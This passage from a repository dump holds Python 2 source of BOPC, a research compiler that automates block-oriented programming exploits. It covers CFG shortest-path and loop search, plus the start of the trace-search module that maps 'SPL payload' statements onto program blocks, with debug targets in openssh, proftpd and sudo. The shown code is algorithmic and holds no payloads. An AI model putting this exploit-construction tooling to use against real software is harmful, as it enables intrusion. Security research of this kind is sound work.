precall_stack + [u.addr], \n                                                            self.__dist[u] + 1)\n\n                        # estimate function's depth\n                        #\n          
              # Note that if function has no returns, then cost will be 0 and P may not\n                        # be applicable\n                        cost, P = self.__depth_metric(R)\n                        self.__funcdepth[ v[0] ] = (cost, P)\n\n\n                        # All return paths have now their backpointers set. \n                        # We select P as return path (according to __depth_metric)\n                        R = [(cost, P)]\n\n                        \n                        dbg_arb(DBG_LVL_4,  '\\tF set:', [(f[0], pretty_list(f[1])) for f in F])\n                        dbg_arb(DBG_LVL_4,  '\\tR set:', [(r[0], pretty_list(r[1])) for r in R])\n                        dbg_prnt(DBG_LVL_4, '\\tP set: %s' % pretty_list(P))\n                        dbg_prnt(DBG_LVL_4, \"\\tFunction '%s' has depth %d\" % (v[0].name, cost))\n\n                    else:\n                        R = []                      # in that case, R is empty\n                        \n                        # if the function is already analyzed, just use its paths\n                        # (+1 to jump to the function and +1 to return from it)\n\n                        if v[2] != -1:              # check if there's an edge\n                            self.__G[ u ][ v[2] ]['depth'] = self.__funcdepth[ v[0] ][0] +1 +1\n                            self.__G[ u ][ v[2] ]['path']  = self.__funcdepth[ v[0] ][1]\n\n\n                    # -------------------------------------------------------------------\n                    # at this point, __funcdepth is set (unless dist[v[0]] <= dist[u]+1)\n                    # -------------------------------------------------------------------\n                    try:\n                        altd = self.__dist[u] + 1 + self.__funcdepth[ v[0] ][0] + 1\n                    except KeyError:\n                        altd = INFINITY             # function root is visited but depth is unknown\n\n\n\n                    # if there's no return, skip 
this edge\n                    if v[2] == -1:\n                        warn(\"Caller 0x%x (%s) has no return\" % (v[0].addr, v[0].name), DBG_LVL_4)\n                        continue\n\n                    # v[2] may also be clobbering\n                    if 'clobbering' in self.__G.node[ v[2] ]:\n                            continue\n\n                    if altd < self.__dist[v[2]]:    # if alternative path is shorter, use it\n                        self.__dist[v[2]]        = altd\n                        self.__backpointer[v[2]] = u\n                        \n                        Q.put(_queue_obj(v[2], altd))\n\n\n                        # Now go back and fix backpointers\n                        #\n                        # it might be possible to not have this edge in the CFG. For example:\n                        # \n                        #       .text:000000000040E00D         mov     rdi, ch_0\n                        #       .text:000000000040E010         call    chan_write_failed\n                        #       .text:000000000040E015         mov     ecx, [ch_0+10h]\n                        #\n                        #       .text:00000000004124E0 chan_write_failed proc near\n                        #       .text:0000000000412552         jmp     chan_delete_if_full_closed\n                        #\n                        #       .text:00000000004122E0 chan_delete_if_full_closed proc near\n                        #       .text:000000000041230C         jmp     channel_free\n                        #   \n                        #       .text:000000000040DA30 channel_free proc near\n                        #       .text:000000000040DAD2         pop     rbx\n                        #       .text:000000000040DAD3         retn\n                        #        \n                        # Here, returning from channel_free() should bring us to 0x40e015; however,\n                        # this edge may not exist. 
Therefore we need to add an 'Ijk_Ret' edge.\n                        if R:\n                            for _, retn in R:\n                                for a, b in to_edges(retn, direction='backward'):                               \n                                    self.__backpointer[ADDR2NODE[a]] = ADDR2NODE[b]\n                                \n                                if len(retn) > 1:   # fix the last backpointer\n                                    self.__backpointer[v[2]] = ADDR2NODE[a]\n\n                                    # add the edge (if it doesn't exist)\n                                    if not self.__G.has_edge(ADDR2NODE[a], v[2]):\n                                        self.__G.add_edge(ADDR2NODE[a], v[2], jumpkind='Ijk_Ret')\n\n\n                            # This is not needed as we start distances from init_dist\n                            #   for r in retn[1:]:\n                            #       self.__dist[ ADDR2NODE[r] ] += self.__dist[u] + 1;\n\n\n                # -----------------------------------------------------------------------\n                # Block is not a caller\n                # -----------------------------------------------------------------------\n                else:       \n                    # if node is clobbering, skip it\n                    if 'clobbering' in self.__G.node[v]:\n                            continue\n\n                    # ignore nodes and edges that are marked as \"avoid\"\n                    if 'avoid' in self.__G.node[v] and precall_stack == self.__G.node[v]['avoid'] or \\\n                       'avoid' in self.__G[u][v]   and precall_stack == self.__G[u][v]['avoid']:\n                            continue\n\n                    # Although we handle this case pretty well, we still highlight it\n                    if u.addr in ADDR2FUNC and v.addr in ADDR2FUNC and ADDR2FUNC[u.addr] != ADDR2FUNC[v.addr]:\n                        warn(\"Node 0x%x (%s) transfers control to '%s'\" %\n      
                          (u.addr, u.name, ADDR2FUNC[v.addr].name), DBG_LVL_4)\n                        \n            \n                    # check if the alternative path is better\n                    altd = self.__dist[u] + 1\n                    if altd < self.__dist[v]:       # if alternative path is shorter, use it\n                        self.__dist[v]        = altd\n                        self.__backpointer[v] = u\n                        \n                        Q.put(_queue_obj(v, altd))  # and add it to the queue\n\n\n        # pop current function from Call Stack before return\n        del self.__callstack[root]\n\n\n        # -------------------------------------------------------------------------------\n        # Search has finished. Extract paths\n        # -------------------------------------------------------------------------------       \n        dbg_prnt(DBG_LVL_4, 'Leaving recursive Dijkstra at 0x%x (%s). Return Set: %s' % \n                                (root.addr, root.name, pretty_list(retn_s, ', ')))\n\n\n\n        # -------------------------------------------------------------------------------\n        # extr_paths(): This internal function extracts all paths from the return blocks\n        #       to the root, using the backpointers.\n        #\n        # :Arg final_blks: A set of all basic blocks that have a return instruction\n        # :Ret: A list of (distance, path) tuples, one per final block\n        #\n        def extr_paths( final_blks ):\n            paths = []                              # list of shortest paths            \n\n            for n in final_blks:                    # for each final node\n                path  = []\n                p     = n\n                found = False\n\n                dbg_prnt(DBG_LVL_4, \"\\tExtracting (reverse) path from 0x%x to 0x%x\" %  \n                                            (n.addr, root.addr))\n        \n                while p > 0:                        # go all the way up to the root                        \n      
              dbg_prnt(DBG_LVL_4, \"\\t\\t%3d 0x%x (%s)\" % (self.__dist.get(p, -1), p.addr, p.name))                 \n\n\n                    path.insert(0, int(p.addr) )    # add node to the path (in reverse order)\n\n                    if p == root:                   # if you reach root, stop\n                        found = True\n                        break\n               \n                    if p in path:                   # cycles will make loop infinite\n                        fatal('Backpointers contain a loop. Abort')\n\n                    p = self.__backpointer.get(p, -1)\n\n                  \n                # if final node is not visited or root is not found, set distance to -1                \n                if not found:\n                    distance = INFINITY\n                else:               \n                    distance = self.__dist.get(n, INFINITY)\n                    if distance != -1 and distance != INFINITY:\n                         distance -= init_dist\n\n                dbg_prnt(DBG_LVL_4, \"\\t\\tFinal Distance: %d (Initial Distance: %d)\" % \n                                        (distance, init_dist))\n\n                # append path to the shortest path list             \n                paths.append( (distance, path if distance < INFINITY else []) )                    \n\n\n            return paths\n\n\n\n        # -------------------------------------------------------------------------------\n\n        return extr_paths(finals), extr_paths(retn_s)\n    \n\n\n    # ---------------------------------------------------------------------------------------------\n    # __dijkstra_variant(): This function essentially bootstraps the recursive Dijkstra algorithm.\n    #\n    # :Arg root: node to start searching from\n    # :Arg finals: a list of all target nodes\n    # :Arg cur_uid: Current statement's UID\n    # :Arg precall_stack: Current precall stack\n    # :Ret: A list of tuples with the length and the path for each 
final node.\n    #\n    def __dijkstra_variant( self, root, finals=[], cur_uid=-1, precall_stack=[] ):\n        self.__dist        = { }                    # visited nodes\n        self.__backpointer = { }                    # backpointers      \n        self.__callstack   = { }                    # call \"stack\" to prevent infinite recursions\n        self.__funcdepth   = { }                    # function depths \n\n\n        clobs = self.__clob_stmts(cur_uid)          # set of clobbering block UIDs to avoid\n\n\n        # UPDATE: Yes they are. Think about calls with clobbering arguments ;)\n        #\n        #   # the first and last nodes are never clobbering\n        #   nonclob = [root.addr] + [final.addr for final in finals]\n\n        # exclude clobbering blocks from search (mark them so they can be avoided)\n        for addr, uidlist in self.__clobbering.iteritems():            \n            # if addr not in nonclob and not disjoint(set(uidlist), clobs):\n            if not disjoint(set(uidlist), clobs):\n                self.__G.node[ ADDR2NODE[addr] ]['clobbering'] = 1\n               \n        \n        # initialize all node distances to INF\n        for vtx, _ in self.__G.nodes_iter(data=True):\n            self.__dist[vtx]        = INFINITY\n            self.__backpointer[vtx] = -1\n\n\n        try:\n            # get shortest paths to all final nodes (ignore the return nodes)\n            paths, _ = self.__dijkstra_variant_rcsv(root, finals, precall_stack=precall_stack)\n        except Exception, e:                        # just in case that something goes wrong                       \n            traceback.print_exc()                   # print exception trace\n            fatal('Unexpected exception in __dijkstra_variant_rcsv(): %s' % str(e))\n\n\n        # print function depths (DBG_LVL_4 only)        \n        dbg_prnt(DBG_LVL_4, '\\tFunction Depths:')\n\n        for func, (depth, path) in self.__funcdepth.iteritems():\n            
dbg_prnt(DBG_LVL_4, '%32s: %2d (%s)' % (func.name, depth, pretty_list(path)))\n\n\n        # print path(s) to the user (DBG_LVL_3 and DBG_LVL_4 only)\n        for final, path in zip(finals, paths):\n\n            if path[0] != INFINITY:\n                dbg_prnt(DBG_LVL_3, \"\\tShortest Path (%x -> %x) found (%d): %s\" % \n                                    (root.addr, final.addr, path[0], pretty_list(path[1], ' -> ')))\n\n            else:\n                dbg_prnt(DBG_LVL_4, \"\\tNo Shortest Path (%x -> %x) found!\" % \n                                    (root.addr, final.addr))\n\n        # clean up clobbering nodes\n        for node, _ in nx.get_node_attributes(self.__G, 'clobbering').items(): \n            del self.__G.node[ node ]['clobbering']                  \n\n\n        return paths                                # return shortest paths (1 for each final node)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __spur_shortest_path(): This function finds the shortest path between spur and destination\n    #       nodes. Function first finds the shortest path using __dijkstra_variant() and then\n    #       calculates the spur path lengths and the expanded spur paths. This information is\n    #       needed for k_shortest_paths(), because 'depth' attributes are cleared every time we\n    #       calculate a spur path and hence it becomes impossible to calculate the length of a\n    #       subpath. Therefore we precalculate all the lengths for all subpaths from root to the\n    #       i-th node, in order to reuse them later on in k_shortest_paths().\n    #\n    # :Arg spur: Spur node\n    # :Arg dst: Destination node (must be exactly one)\n    # :Arg precall_stack: Current precall stack\n    # :Ret: If a shortest path exists, function returns a tuple (path, pathlens, expaths) that\n    #       contains the path, the spur path lengths and the expanded spur paths. 
Otherwise,\n    #       function returns a tuple with pathlens being set to [-1].\n    #\n    def __spur_shortest_path( self, spur, dst, cur_uid=-1, precall_stack=[] ):\n        # ---------------------------------------------------------------------\n        # Clear leftovers in CFG from previous calls. \n        #\n        # This is an important step as 'depths' for the same function can vary\n        # depending on the root and/or the current state of the algorithm.  As \n        # an example consider the  case where we have a set of functions whose\n        # call graph is fully connected (i.e., a very weird form of recursion).\n        # In this case the 'depth' of each function depends on the initial entry\n        # point.\n        # ---------------------------------------------------------------------\n        for n, _ in nx.get_edge_attributes(self.__G, 'depth').items():\n            del self.__G.edge[ n[0] ][ n[1] ]['depth']\n\n        for n, _ in nx.get_edge_attributes(self.__G, 'path').items():\n            del self.__G.edge[ n[0] ][ n[1] ]['path']\n\n\n        # ---------------------------------------------------------------------\n        # Find the shortest (context sensitive) path\n        # ---------------------------------------------------------------------        \n        paths = self.__dijkstra_variant(ADDR2NODE[spur], [ADDR2NODE[dst]], cur_uid, precall_stack)\n        length, path = paths[0]\n\n        if len(paths) != 1:                         # this should never happen\n            fatal('__spur_shortest_path() should work with a single path')\n\n        if length == INFINITY:                      # if path doesn't exist, abort\n            return ([], [-1], [])\n\n\n        # ---------------------------------------------------------------------\n        # Calculate the spur path lengths and the expanded spur paths\n        #\n        # pathlens[i] has the length of the shortest subpath \"path[:i]\"\n        # expaths[i] has the expanded 
shortest subpath \"path[:i]\"\n        # ---------------------------------------------------------------------\n        spurlen  = 0\n        expath   = [path[0]]\n        pathlens = [0]        \n        expaths  = [expath[:]]\n        \n\n        for u, v in to_edges(path):                 # for every edge on the path\n            # Edge (u,v) may not exist (due to indirect jumps). For instance:\n            #\n            #       .text:000000000040589F        call    xfree\n            #       .text:00000000004058A4 loc_4058A4:\n            #\n            #       .text:0000000000415260 xfree           proc near\n            #       .....\n            #       .text:000000000041526D        jmp     _free\n            #\n            #       .plt:00000000004034B0 _free           proc near\n            #       .plt:00000000004034B0        jmp     cs:off_621248\n            #            \n            # In that case, we simply increase the length by 1\n            if not self.__G.has_edge(ADDR2NODE[u], ADDR2NODE[v]):\n                edge_data = { }                     # assign an empty dictionary\n            else:\n                edge_data = self.__G.edge[ ADDR2NODE[u] ][ ADDR2NODE[v] ]\n\n\n            # update spurlen (get depth edge if exists)\n            spurlen += edge_data.get('depth', 1)\n            pathlens.append( spurlen )\n\n            # update expanded paths. 
Append path (if exists) and the new node\n            # (it's important to use [:] to create a copy of expath)\n            expath += edge_data.get('path', []) + [v]\n            expaths.append(expath[:])\n\n\n        # The expanded path should have as many nodes as the total length\n        #\n        # However this is not always true, because the expanded path may not be so \"expanded\"\n        # The only problem with that is that we may return the same path >1 times\n        #\n        #       if spurlen != len(expath) - 1:\n        #           fatal(\"Something is wrong with 'expath' in __spur_shortest_path()\")\n\n\n        # The last element of pathlens list is the total path length\n        if length != pathlens[-1]:          \n            # This may occur when we have an unresolvable function (eval/sudo/sudo):\n            #\n            #       .text:000000000040F5A5         test    rbp, rbp\n            #       .text:000000000040F5A8         jz      short loc_40F5C6\n            #       .text:000000000040F5AA         xor     ebx, ebx\n            #       .text:000000000040F5AC         nop     dword ptr [rax+00h]\n            #       .text:000000000040F5B0\n            #       .text:000000000040F5B0 loc_40F5B0:\n            #       .text:000000000040F5B0         mov     rdx, r15\n            #       .text:000000000040F5B3         mov     rsi, r14\n            #       .text:000000000040F5B6         mov     edi, r13d\n            #       .text:000000000040F5B9         call    qword ptr [r12+rbx*8]\n            #       .text:000000000040F5BD         add     rbx, 1\n            #       .text:000000000040F5C1         cmp     rbx, rbp\n            #       .text:000000000040F5C4         jnz     short loc_40F5B0\n            #       .text:000000000040F5C6\n            #       .text:000000000040F5C6 loc_40F5C6:\n            #       .text:000000000040F5C6         mov     rbx, [rsp+38h+var_30]\n            #       .text:000000000040F5CB         mov     rbp, 
[rsp+38h+var_28]\n            #       .text:000000000040F5D0         mov     r12, [rsp+38h+var_20]\n            #       .text:000000000040F5D5         mov     r13, [rsp+38h+var_18]\n            #       .text:000000000040F5DA         mov     r14, [rsp+38h+var_10]\n            #       .text:000000000040F5DF         mov     r15, [rsp+38h+var_8]\n            #       .text:000000000040F5E4         add     rsp, 38h\n            #       .text:000000000040F5E8         retn\n            #\n            # Here, \"call qword ptr [r12+rbx*8]\" does not really go anywhere, however the distance\n            # from 0x40F5B0 to 0x40F5BD is 2. This happens when we visit a function with length <1.\n            #\n            #       fatal(\"Something is wrong with 'pathlens' in __spur_shortest_path()\")\n            pass\n\n        return (path, pathlens, expaths)            # return spur path\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor.\n    #\n    # :Arg graph: CFG to work on\n    #\n    def __init__( self, cfg, clobbering={ }, adj={ } ):\n        self.__G          = cfg.graph               # store arguments internally\n        self.__clobbering = { }                     # clobbering blocks\n\n\n        self.__radj = mk_reverse_adj(adj)           # build the reverse adjacency list\n\n        # build a suitable dictionary with clobbering blocks\n        for uid, addrs in clobbering.iteritems():\n            for addr in addrs:\n                self.__clobbering.setdefault(addr, 
[]).append(uid)\n       \n\n        super(self.__class__, self).__init__(       # call parent class\n            self.__G, \n            self.__spur_shortest_path, \n            lambda node : ADDR2NODE[node]           # transform address index to \"node\" object \n        )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # shortest_path(): Find the shortest path (with respect to CFG) from a single source to a\n    #       destination (destinations can be >1). This function is pretty much a wrapper for\n    #       __dijkstra_variant()\n    #\n    # :Arg src: Source node\n    # :Arg dst: Destination node(s)\n    # :Arg cur_uid: Current UID of the SPL statement\n    # :Ret: A list of tuples with the length and the path for each final node. If addresses are\n    #   not valid function returns an empty list.\n    #\n    def shortest_path( self, src, dst, cur_uid=-1 ):\n        if not isinstance(dst, int): single = 0\n        else: single = 1; dst = [dst]               # make single destination a list\n\n\n        try:\n            # sp = self.__bfs_variant(ADDR2NODE[src], [ADDR2NODE[d] for d in dst])\n            sp = self.__dijkstra_variant(ADDR2NODE[src], [ADDR2NODE[d] for d in dst], cur_uid)\n\n            return sp[0] if single else sp          # if there's 1 path, return a tuple\n\n        except KeyError as val:        \n            sp = [(INFINITY, [])]*len(dst)          # failure\n\n            warn(\"CFG does not have a basic block at address %s (decimal)\" % val )\n            return sp[0] if single else sp\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # shortest_loop(): Find the shortest loop (with respect to CFG) starting from a single source \n    #       The cycle is context sensitive, so we have to use __dijkstra_variant(). 
To find a loop,\n    #       all we have to do is find the shortest path from the source to all of its\n    #       predecessors and then add one more edge to create a cycle.\n    #\n    #       Here's a good example of context sensitivity in cycles:\n    #\n    #           .text:0000000000404EDB         xor     ebx, ebx\n    #           .text:0000000000404EDD         nop     dword ptr [rax]\n    #           .text:0000000000404EE0\n    #           .text:0000000000404EE0 loc_404EE0:\n    #           .text:0000000000404EE0         mov     edi, ds:listen_socks[rbx*4] ; fd\n    #           .text:0000000000404EE7         call    _close\n    #           .text:0000000000404EEC         lea     eax, [rbx+1]\n    #           .text:0000000000404EEF i = rax                                 ; int\n    #           .text:0000000000404EEF         add     rbx, 1\n    #           .text:0000000000404EF3         cmp     cs:num_listen_socks, eax\n    #           .text:0000000000404EF9         jg      short loc_404EE0\n    #\n    #           .plt:0000000000403160 _close  proc near\n    #           .plt:0000000000403160         jmp     cs:off_6210A0\n    #\n    #       In the above code, there's a cycle: 404eec - 404ee0 - 403160 - 10000a0 - 404eec.\n    #       However, if we start searching from 0x403160, we will find no cycle, as we're in a\n    #       different context (we don't know where to return from 0x10000a0).\n    #\n    # :Arg src: Source node\n    # :Arg cur_uid: Current UID of the SPL statement\n    # :Ret: A tuple with the length and the actual cycle. 
If a cycle does not exist, the function\n    #       returns an empty list.\n    #\n    def shortest_loop( self, src, cur_uid=-1 ):\n        try:\n            # find all predecessor blocks\n            predecessors = [pred for pred in ADDR2NODE[src].predecessors]\n\n            # if there are no predecessors, there are no cycles ;)\n            if not predecessors: \n                return (INFINITY, [])\n\n\n            # find shortest path from source to all predecessors\n            sp = self.__dijkstra_variant(ADDR2NODE[src], predecessors, cur_uid)\n\n            # find the shortest among the shortest paths          \n            dists = [dist for dist, _ in sp]                  \n            idx   = dists.index(min(dists))         # index of the minimum\n\n\n            if sp[idx][0] == INFINITY:\n                cycle = (INFINITY, [])\n            else:\n                # add the predecessor edge to form a cycle\n                # TODO: check if the predecessor edge is in the same context\n                cycle = (sp[idx][0] + 1, sp[idx][1] + [src])\n\n\n            del sp                                  # we don't need you anymore\n\n            return cycle                            # return the shortest loop\n\n        except KeyError as val:        \n            warn(\"CFG does not have a basic block at address %s (decimal)\" % val )\n\n            return [(INFINITY, [])]                 # failure\n\n\n\n# -------------------------------------------------------------------------------------------------\n'''\nif __name__ == '__main__':                          # DEBUG ONLY\n    set_dbg_lvl( DBG_LVL_0 )\n\n\n    import angr\n    \n    project = angr.Project('eval/proftpd/proftpd', load_options={'auto_load_libs': False})    \n    CFG     = project.analyses.CFGFast()\n    CFG.normalize()\n\n    # create a quick mapping between addresses and nodes (basic blocks)\n    for node in CFG.graph.nodes():\n        ADDR2NODE[ node.addr ] = node\n\n\n    # create a quick 
mapping between basic block addresses and their corresponding functions\n    for _, func in CFG.functions.iteritems():\n        for addr in func.block_addrs:\n            ADDR2FUNC[ addr ] = func\n\n\n    p = _cfg_shortest_path(CFG)\n\n\n    paths = []\n\n\n    # avoid some node\n    # CFG.graph.node[ ADDR2NODE[0x4058A4] ]['clobbering'] = 1\n\n    # for ll, pp in p.shortest_path(0x405897, [0x40c8f0]):    \n    # for ll, pp in p.k_shortest_paths(0x40f5a5, 0x40f5c6, 0, PARAMETER_P): # sudo\n    # for ll, pp in p.k_shortest_paths(0x412c98, 0x40c8f0, 0, PARAMETER_P): # openssh\n    \n\n    #for ll, pp in p.k_shortest_paths(0x42acf0, 0x42ad5e, 0, 2): # openssh\n    for ll, pp in p.k_shortest_paths(0x406806, 0x42ad5e, 0, 10): # openssh\n\n    #for ll, pp in p.k_shortest_loops(0x4043f5, 0, PARAMETER_P):   # openssh\n        print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'\n        print 'Path (%d): %s' % (ll, pretty_list(pp))\n\n        paths.append( (ll, pp) )\n\n    print 'Printing all paths:'\n    for ll, pp in paths:\n        print 'Path (%d): %s' % (ll, pretty_list(pp))\n\n\n    print '\\n\\n\\n******************************************************\\n\\n\\n'\n\n    for ll, pp in p.k_shortest_paths(0x42acf0, 0x42ad5e, 0, 10): # openssh\n    \n\n    #for ll, pp in p.k_shortest_loops(0x4043f5, 0, PARAMETER_P):   # openssh\n        print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'\n        print 'Path (%d): %s' % (ll, pretty_list(pp))\n\n        paths.append( (ll, pp) )\n\n\n    print 'Printing all paths:'\n    for ll, pp in paths:\n        print 'Path (%d): %s' % (ll, pretty_list(pp))\n\n\n'''\n\n# TODO: FIX MEEEEE!!!!!!!!!!!!!\n# BAD LOOP (mod: 0, set: 2) 40b277 - 40b28f - 402a40 - 10003c0 - 40b299 - 40b2b6 - \n#                           40b2e5 - 40b2eb - 402a80 - 10003e0 - 40b277\n\n\n# -------------------------------------------------------------------------------------------------\n"
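The `shortest_loop()` construction above (shortest path from the source to each of its predecessors, plus one closing edge) can be sketched in isolation. This is a minimal, self-contained Python 3 sketch over a toy adjacency dict with unit edge weights, not the module's actual code: the real implementation runs a context-sensitive Dijkstra variant over the angr CFG.

```python
from collections import deque

INFINITY = float('inf')

def bfs_shortest_path(adj, src, dst):
    """Unweighted shortest path src -> dst; (INFINITY, []) if unreachable."""
    seen, queue = {src}, deque([[src]])
    while queue:
        path = queue.popleft()
        if path[-1] == dst:
            return len(path) - 1, path
        for nxt in adj.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return INFINITY, []

def shortest_loop(adj, src):
    """Shortest cycle through src: path to the nearest predecessor + 1 edge."""
    preds = [u for u, vs in adj.items() if src in vs]
    best = (INFINITY, [])
    for p in preds:                     # no predecessors -> no cycle
        dist, path = bfs_shortest_path(adj, src, p)
        if dist + 1 < best[0]:
            best = (dist + 1, path + [src])
    return best
```

For `adj = {0: [1], 1: [2], 2: [0, 3], 3: []}` the only predecessor of node 0 is node 2, so the loop is the path 0-1-2 plus the back edge 2-0; node 3 has a predecessor but no path back to it, so no cycle exists.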
  },
  {
    "path": "source/search.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# search.py:\n#\n# This module is the \"heart\" of BOPC. 
It implements the trace searching algorithm that looks\n# for a trace that uses several accepted blocks (and no clobbering blocks) and successfully\n# reconstructs the execution of the SPL payload.\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport map      as M\nimport path     as P\nimport delta    as D\nimport simulate as S\nimport output   as O\n\nimport math\n\n\n\n# -------------------------------------------------------------------------------------------------\n# search: This class searches for subsets of accepted blocks that could reconstruct the execution\n#   of the SPL payload.\n#\nclass search:\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __remove_goto: Remove goto statements. Gotos are not real statements; that is, they don't \n    #       require an accepted block to get executed. Therefore, if they stay on the statement\n    #       list, we will have a lot of issues. 
Thus, the best solution is to remove them.\n    #       \n    # :Arg accepted: A dictionary with all accepted blocks\n    # :Arg adj: The adjacency list.\n    # :Ret: Function returns a tuple that has the updated adjacency list and another list with all\n    #       goto statements that should be removed.\n    #\n    def __remove_goto( self, accepted, adj ):\n        dbg_prnt(DBG_LVL_3, \"Removing goto statements...\")\n        \n        # Build the reverse adjacency list (r_adj)\n        r_adj = self.__mk_reverse_adjacency_list(adj)\n        rm    = []                                  # remove list\n\n\n        for stmt in self.__IR:                      # iterate over goto statements\n            if stmt['type'] == 'jump':               \n                rm.append(stmt['uid'])              # add statement to remove list\n\n                # fix every statement that points to the goto\n                for src in r_adj[ stmt['uid'] ]:\n\n                    # remove edges that point to the goto\n                    adj[src]  = filter(lambda x : x != stmt['uid'], adj[src])                    \n                    adj[src] += adj[stmt['uid']]    # add the bypass edge\n\n                    # if we have multiple gotos chained together, also fix the 'target' attribute\n                    if  self.__IR[ src ]['type'] == 'jump':\n                        self.__IR[ src ]['target'] = stmt['target']\n\n\n                del adj[ stmt['uid'] ]              # we don't need the goto anymore\n\n                # Now we have to update r_adj as well. 
The simplest way to do that is to\n                # rebuild it from scratch (not efficient, but adj is pretty small)\n                r_adj = self.__mk_reverse_adjacency_list(adj)\n\n\n        # return the updated adjacency and the UIDs of the goto statements\n        return adj, rm\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mk_adjacency_list(): This function builds the adjacency list between SPL statements. That\n    #       is, the adjacency list indicates the set of possible statements that can be executed\n    #       after the i-th statement (statement i does not always go to i+1).\n    #\n    # :Arg stmt_l: A (shuffled) list with the UIDs of all SPL statements.\n    # :Ret: A dictionary that has an entry for each statement (except the last one) that shows the\n    #       next statements\n    #\n    def __mk_adjacency_list( self, stmt_l ):\n        # To simplify this process, we make some observations first.\n        #   [1]. The first statement cannot be a conditional jump (it uses a register)\n        #   [2]. goto and conditional jumps are single groups\n        #   [3]. 
When a group has >1 statements, then i -> i+1 for each statement in the group\n\n        adj  = { }                                  # The adjacency list (dictionary)\n        prev = stmt_l[0]                            # get the first statement\n\n        for curr in stmt_l[1:]:                     # for each statement\n            # goto statements have a single target (probably not i+1)\n            if self.__IR[prev]['type'] == 'jump':\n                adj[prev] = [to_uid(self.__IR[prev]['target'])]\n                \n            # conditional jumps have two targets (one of them is i+1)\n            elif self.__IR[prev]['type'] == 'cond':\n                # Taken branch always first\n                adj[prev] = [to_uid(self.__IR[prev]['target']), curr]\n\n            # every other statement has i+1 as target\n            else:\n                adj[prev] = [curr]\n\n            prev = curr                             # update previous statement and move on\n\n\n        # special case for the last statement: There's no next statement, unless it's a jump\n        if self.__IR[curr]['type'] in ['jump', 'cond']:\n            adj[curr] = [to_uid(self.__IR[ prev ]['target'])]\n            \n\n        dbg_arb(DBG_LVL_3, \"SPL statement adjacency list\", adj)\n\n        return adj                                  # return the adjacency list\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mk_reverse_adjacency_list(): This function builds the reverse adjacency list between SPL\n    #       statements. 
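The edge reversal performed here is small enough to demo standalone. A Python 3 sketch of the same setdefault/append pattern (the module itself is Python 2 and uses `iteritems()`):

```python
def mk_reverse_adjacency_list(adj):
    # Flip every forward edge a -> c into an entry rev[c] containing a
    rev = {}
    for a, succs in adj.items():
        for c in succs:
            rev.setdefault(c, []).append(a)
    return rev
```

For `adj = {0: [1, 2], 1: [2]}` this yields `{1: [0], 2: [0, 1]}`: statement 2 can be reached from both 0 and 1, which is exactly what `__remove_goto()` needs to find every statement pointing at a goto.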
That is, it actually reverses the edge direction\n    #\n    # :Arg adj: The adjacency list\n    # :Ret: A dictionary that has an entry for each statement (except the last one) that shows the\n    #       *previous* statements\n    #\n    def __mk_reverse_adjacency_list( self, adj ):\n        rev_adj = { }\n\n        for a, b in adj.iteritems():\n            for c in b:\n                rev_adj.setdefault(c, []).append(a)\n\n        return rev_adj\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __shuffle: Shuffle the statements. This function is a generator that returns the SPL\n    #       statements in a different order each time, so they can be executed out-of-order. The\n    #       order must preserve the execution flow, so statements have to be shuffled in groups.\n    #       \n    # :Arg accepted: A dictionary with all accepted blocks\n    # :Ret: Function is a generator, so each time a different permutation of the SPL payload is \n    #       returned. The permutation is an ordered list with the UIDs of the SPL statements.\n    #\n    def __shuffle( self, accepted ):\n        # -------------------------------------------------------------------------------\n        # kth_permutation(): This internal function returns the k-th permutation of a\n        #       given sequence of numbers.\n        #\n        # :Arg group: Group to work on\n        # :Arg k: The index of the k-th permutation\n        #\n        def kth_permutation( group, k ):\n            tmpgrp = list(group[:])                 # create a temporary copy of the group\n            shuff  = []                             # result            \n            fact   = math.factorial(len(group))     # find group's factorial            \n            k     %= fact                           # don't go beyond n!\n\n            while tmpgrp:\n                fact = fact / len(tmpgrp)           # n! 
